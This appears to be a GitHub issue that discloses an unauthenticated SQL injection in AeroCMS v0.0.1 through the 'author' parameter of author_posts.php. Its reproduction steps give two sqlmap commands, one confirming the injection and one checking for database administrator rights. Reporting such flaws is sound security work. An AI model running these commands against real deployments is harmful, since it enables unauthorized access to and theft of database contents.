AeroCMS v0.0.1 Frontend SQL Injection vulnerability

Open w4n95 opened this issue 2 years ago • 0 comments

  • Description

AeroCMS v0.0.1 was discovered to contain a SQL injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability does not require authentication and allows attackers to obtain database administrator privileges and access database information, etc.

  • Reproduce

  1. No login required. Execute the sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author". We can see that a SQL injection vulnerability exists in the "author" parameter.

  2. Execute the sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba. We can see "DBA: TRUE".

  • Vulnerable Code

The "author" parameter is not escaped before executing the SQL query statement.

w4n95 · Nov 27 '22 13:11